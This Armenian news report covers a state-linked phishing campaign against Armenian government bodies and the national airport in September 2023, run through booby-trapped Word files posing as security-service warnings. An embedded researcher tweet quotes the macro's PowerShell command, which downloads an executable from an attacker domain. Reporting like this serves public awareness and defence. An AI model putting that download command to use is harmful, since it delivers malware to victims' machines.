ԼՂ-ի դեմ Ադրբեջանի սանձազերծած ռազմական գործողություններից առաջ հաքերային հարձակում է իրականցվել ՀՀ պետական կառույցների և օդանավակայանի դեմ. մասնագետ
2 րոպեի ընթերցում

ԵՐԵՎԱՆ, 22 ՍԵՊՏԵՄԲԵՐԻ, ԱՐՄԵՆՊՐԵՍ: Արցախի դեմ Ադրբեջանի լայնածավալ ռազմական գործողություններից առաջ՝ սեպտեմբերի 10-19-ը ընկած ժամանակահատվածում, «Արմենիա» միջազգային օդանավակայանների և Հայաստանի պետական կառույցների վրա հաքերային լուրջ հարձակում է եղել:
«Արմենպրես»-ի հետ զրույցում տեղեկատվական անվտանգության փորձագետ Սամվել Մարտիրոսյանը նշեց՝ վնասաբեր ծրագիրը ներդրված է MS Word փաստաթղթում, որը հաքերների թիմը ներկայացրել է որպես Ազգային անվտանգության ծառայության զգուշացում:
«Տարածել են ԱԱԾ-ի անունից կեղծ հայտարարություններ, նամակներ՝ կոնկրետ թիրախների դեմ, որոնց թվում է օդանվակայանը և պետական կառույցները: Հարձակվողները շատ լավ գիտեն Հայաստանի ներքին բյուրոկրատական գործընթացները, տիրող իրավիճակը»,-նշեց փորձագետը:
Նա ընգծեց՝ հարձակվողների թիմն ակնհայտ լուրջ է, ամենայն հավանականությամբ պետական կապեր ունեցող հաքերային թիմ է:
«Թե ում կողմից կարող է եղած լինել հարձակումն, այս պահին նշել չեմ կարող: Հետքերը նման են պետական կառույցների հետ կապ ունցող հաքերների, այսինքն մենք կարող ենք խոսել ինչ-որ կոնկրետ երկրին պատկանող կամ այդ երկրի պետական շահերը սպասարկող հաքերային թիմի մասին: Այս պահին երկիրը նշել հստակ չենք կարող, բայց այդպիսի երկրները շատ չեն»,- նշեց Մարտիրոսյանը:
Հարձակումն իրականցվել է կոնկրետ Հայաստանի դեմ, հենց հայերենով: Հարձակման վրա ուշադրությունը հրավիրել է Սինգապուրում գործող կիբերանվտանգության հետազոտող Ժիսիանգ Հաոն։
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code
powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe pic.twitter.com/9sFHJB0aax
— zhixiang hao (@HaoZhixiang) September 21, 2023